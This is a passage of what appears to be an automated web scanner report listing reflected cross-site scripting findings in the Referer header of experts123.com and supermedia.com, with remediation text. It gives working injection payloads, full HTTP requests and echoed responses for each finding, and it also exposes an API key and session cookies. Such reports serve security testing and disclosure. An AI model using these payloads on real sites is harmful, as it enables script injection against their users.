Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=dacf1"%3balert(1)//155dee88ae4

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:35:57 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:35:56 GMT
Connection: close
Content-Length: 34659


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
USERNAME = "";
var USERID = "";
var PROFILE_URL = "";
var GOOGLE_API_KEY = "ABQIAAAAcRGdvpiMEwEwWXs1S4XT8BT5hIv4UWzHWp5UXUWPJ9WyHBGHHBQZys70u_wUuQ6cH86QKzAVqOnPvA";
var REFERRAL = "dacf1";alert(1)//155dee88ae4";
var RSQ = true;

$(function() {
experts123.Question.initialize(541537, 1, 'UA-6611450-1');


});
</script>
...[SNIP]...

4.680. http://www.experts123.com/q/what-is-a-mortgage.html [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.experts123.com
Path:   /q/what-is-a-mortgage.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2ffb'%3balert(1)//2017b493094 was submitted in the Referer HTTP header. This input was echoed as c2ffb';alert(1)//2017b493094 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /q/what-is-a-mortgage.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=c2ffb'%3balert(1)//2017b493094

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:07 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:07 GMT
Connection: close
Content-Length: 85378


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
}
else
feedbackDialog.dialog('open');
});

experts123.SetExternalReferral('http://www.google.com/search?hl=en&q=c2ffb';alert(1)//2017b493094');
});


</script>
...[SNIP]...

4.681. http://www.experts123.com/q/what-is-a-mortgage.html [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.experts123.com
Path:   /q/what-is-a-mortgage.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d6163"%3balert(1)//498765472fb was submitted in the Referer HTTP header. This input was echoed as d6163";alert(1)//498765472fb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /q/what-is-a-mortgage.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=d6163"%3balert(1)//498765472fb

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:07 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:07 GMT
Connection: close
Content-Length: 85378


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
USERNAME = "";
var USERID = "";
var PROFILE_URL = "";
var GOOGLE_API_KEY = "ABQIAAAAcRGdvpiMEwEwWXs1S4XT8BT5hIv4UWzHWp5UXUWPJ9WyHBGHHBQZys70u_wUuQ6cH86QKzAVqOnPvA";
var REFERRAL = "d6163";alert(1)//498765472fb";
var RSQ = true;

$(function() {
experts123.Question.initialize(202208, 1, 'UA-6611450-1');


});
</script>
...[SNIP]...

4.682. http://www.experts123.com/q/what-is-an-online-checking-account.html [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.experts123.com
Path:   /q/what-is-an-online-checking-account.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0800"%3balert(1)//0d9e6834871 was submitted in the Referer HTTP header. This input was echoed as d0800";alert(1)//0d9e6834871 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /q/what-is-an-online-checking-account.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=d0800"%3balert(1)//0d9e6834871

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:13 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:13 GMT
Connection: close
Content-Length: 33683


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
USERNAME = "";
var USERID = "";
var PROFILE_URL = "";
var GOOGLE_API_KEY = "ABQIAAAAcRGdvpiMEwEwWXs1S4XT8BT5hIv4UWzHWp5UXUWPJ9WyHBGHHBQZys70u_wUuQ6cH86QKzAVqOnPvA";
var REFERRAL = "d0800";alert(1)//0d9e6834871";
var RSQ = true;

$(function() {
experts123.Question.initialize(626726, 1, 'UA-6611450-1');


});
</script>
...[SNIP]...

4.683. http://www.experts123.com/q/what-is-an-online-checking-account.html [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.experts123.com
Path:   /q/what-is-an-online-checking-account.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aaeae'%3balert(1)//9e376e61a79 was submitted in the Referer HTTP header. This input was echoed as aaeae';alert(1)//9e376e61a79 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /q/what-is-an-online-checking-account.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=aaeae'%3balert(1)//9e376e61a79

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:14 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:14 GMT
Connection: close
Content-Length: 33683


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
}
else
feedbackDialog.dialog('open');
});

experts123.SetExternalReferral('http://www.google.com/search?hl=en&q=aaeae';alert(1)//9e376e61a79');
});


</script>
...[SNIP]...

4.684. http://www.experts123.com/q/what-is-the-difference-between-a-mortgage-broker-and-a-mortgage-banker.html [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.experts123.com
Path:   /q/what-is-the-difference-between-a-mortgage-broker-and-a-mortgage-banker.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 11ee8"%3balert(1)//0fd04f86b98 was submitted in the Referer HTTP header. This input was echoed as 11ee8";alert(1)//0fd04f86b98 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /q/what-is-the-difference-between-a-mortgage-broker-and-a-mortgage-banker.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=11ee8"%3balert(1)//0fd04f86b98

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:07 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:07 GMT
Connection: close
Content-Length: 46266


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
USERNAME = "";
var USERID = "";
var PROFILE_URL = "";
var GOOGLE_API_KEY = "ABQIAAAAcRGdvpiMEwEwWXs1S4XT8BT5hIv4UWzHWp5UXUWPJ9WyHBGHHBQZys70u_wUuQ6cH86QKzAVqOnPvA";
var REFERRAL = "11ee8";alert(1)//0fd04f86b98";
var RSQ = true;

$(function() {
experts123.Question.initialize(197790, 1, 'UA-6611450-1');


});
</script>
...[SNIP]...

4.685. http://www.experts123.com/q/what-is-the-difference-between-a-mortgage-broker-and-a-mortgage-banker.html [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.experts123.com
Path:   /q/what-is-the-difference-between-a-mortgage-broker-and-a-mortgage-banker.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71c11'%3balert(1)//0c64a2d8a24 was submitted in the Referer HTTP header. This input was echoed as 71c11';alert(1)//0c64a2d8a24 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /q/what-is-the-difference-between-a-mortgage-broker-and-a-mortgage-banker.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=71c11'%3balert(1)//0c64a2d8a24

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:07 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:07 GMT
Connection: close
Content-Length: 46266


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
}
else
feedbackDialog.dialog('open');
});

experts123.SetExternalReferral('http://www.google.com/search?hl=en&q=71c11';alert(1)//0c64a2d8a24');
});


</script>
...[SNIP]...

4.686. http://www.experts123.com/q/what-is-the-meaning-of-aba-on-my-payroll-direct-deposit-enrollment-form.html [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.experts123.com
Path:   /q/what-is-the-meaning-of-aba-on-my-payroll-direct-deposit-enrollment-form.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aeb3b"%3balert(1)//3f4b39407ec was submitted in the Referer HTTP header. This input was echoed as aeb3b";alert(1)//3f4b39407ec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /q/what-is-the-meaning-of-aba-on-my-payroll-direct-deposit-enrollment-form.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=aeb3b"%3balert(1)//3f4b39407ec

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:09 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:09 GMT
Connection: close
Content-Length: 31063


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
USERNAME = "";
var USERID = "";
var PROFILE_URL = "";
var GOOGLE_API_KEY = "ABQIAAAAcRGdvpiMEwEwWXs1S4XT8BT5hIv4UWzHWp5UXUWPJ9WyHBGHHBQZys70u_wUuQ6cH86QKzAVqOnPvA";
var REFERRAL = "aeb3b";alert(1)//3f4b39407ec";
var RSQ = true;

$(function() {
experts123.Question.initialize(1075195, 1, 'UA-6611450-1');


});
</script>
...[SNIP]...

4.687. http://www.experts123.com/q/what-is-the-meaning-of-aba-on-my-payroll-direct-deposit-enrollment-form.html [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.experts123.com
Path:   /q/what-is-the-meaning-of-aba-on-my-payroll-direct-deposit-enrollment-form.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2399d'%3balert(1)//1fd21ed3d2 was submitted in the Referer HTTP header. This input was echoed as 2399d';alert(1)//1fd21ed3d2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /q/what-is-the-meaning-of-aba-on-my-payroll-direct-deposit-enrollment-form.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=2399d'%3balert(1)//1fd21ed3d2

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:09 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:09 GMT
Connection: close
Content-Length: 31061


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
}
else
feedbackDialog.dialog('open');
});

experts123.SetExternalReferral('http://www.google.com/search?hl=en&q=2399d';alert(1)//1fd21ed3d2');
});


</script>
...[SNIP]...

4.688. http://www.experts123.com/questions/ask [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.experts123.com
Path:   /questions/ask

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95b18'%3balert(1)//6e16c45e18f was submitted in the Referer HTTP header. This input was echoed as 95b18';alert(1)//6e16c45e18f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /questions/ask HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=95b18'%3balert(1)//6e16c45e18f

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Thu, 03 Feb 2011 16:35:53 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=cijh1055dy4tss55r0fkks45; path=/; HttpOnly
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=cijh1055dy4tss55r0fkks45; path=/; HttpOnly
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:35:53 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:35:53 GMT
Connection: close
Content-Length: 11928


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
}
else
feedbackDialog.dialog('open');
});

experts123.SetExternalReferral('http://www.google.com/search?hl=en&q=95b18';alert(1)//6e16c45e18f');
});


</script>
...[SNIP]...

4.689. http://www.experts123.com/questions/filter/bank [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.experts123.com
Path:   /questions/filter/bank

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 93a1d'%3balert(1)//1261bf759ea was submitted in the Referer HTTP header. This input was echoed as 93a1d';alert(1)//1261bf759ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /questions/filter/bank HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=93a1d'%3balert(1)//1261bf759ea

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:35:55 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:35:54 GMT
Connection: close
Content-Length: 49014


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
}
else
feedbackDialog.dialog('open');
});

experts123.SetExternalReferral('http://www.google.com/search?hl=en&q=93a1d';alert(1)//1261bf759ea');
});


</script>
...[SNIP]...

4.690. http://www.supermedia.com/spportal/404.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /spportal/404.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 60377</script><script>alert(1)</script>5e2b578442b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /spportal/404.jsp HTTP/1.1
Host: www.supermedia.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=60377</script><script>alert(1)</script>5e2b578442b
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; mbox=check#true#1296759589|session#1296759528614-838261#1296761389; s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:14:04 GMT
Content-Type: text/html;charset=UTF-8
Connection: close
Cache-Control: private
Content-Length: 20813


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Online Advertising : Superpages Small Business Online Advertising</title>



...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.channel="";
s.pagetype="";
s.server="";
s.referrer="http://www.google.com/search?hl=en&q=60377</script><script>alert(1)</script>5e2b578442b";
s.pageName="";
s.prop1="";
s.prop2="";
s.prop3="Not Logged in";
s.prop4="";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop8="";
s.prop9="";
s.prop10="";
s.prop11="";
s.prop12="";
s.prop13="";
s.prop14="
...[SNIP]...

4.691. http://www.supermedia.com/spportal/img-spportal/supermedia/background/bkg_left_col_top_shadow_top.gif [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /spportal/img-spportal/supermedia/background/bkg_left_col_top_shadow_top.gif

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3575c"-alert(1)-"7068f2207e8 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /spportal/img-spportal/supermedia/background/bkg_left_col_top_shadow_top.gif HTTP/1.1
Host: www.supermedia.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=3575c"-alert(1)-"7068f2207e8
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; mbox=check#true#1296759589|session#1296759528614-838261#1296761389

Response (redirected)

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:13:57 GMT
Content-Type: text/html;charset=UTF-8
Connection: close
Cache-Control: private
Content-Length: 20791


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Online Advertising : Superpages Small Business Online Advertising</title>



...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.channel="";
s.pagetype="";
s.server="";
s.referrer="http://www.google.com/search?hl=en&q=3575c"-alert(1)-"7068f2207e8";
s.pageName="";
s.prop1="";
s.prop2="";
s.prop3="Not Logged in";
s.prop4="";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop8="";
s.prop9="";
s.prop10="";
s.prop11="";
s.prop12="";
s.prop13="";
s.prop14="
...[SNIP]...

4.692. https://www.supermedia.com/spportal/spportalFlow.do [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /spportal/spportalFlow.do

Issue detail

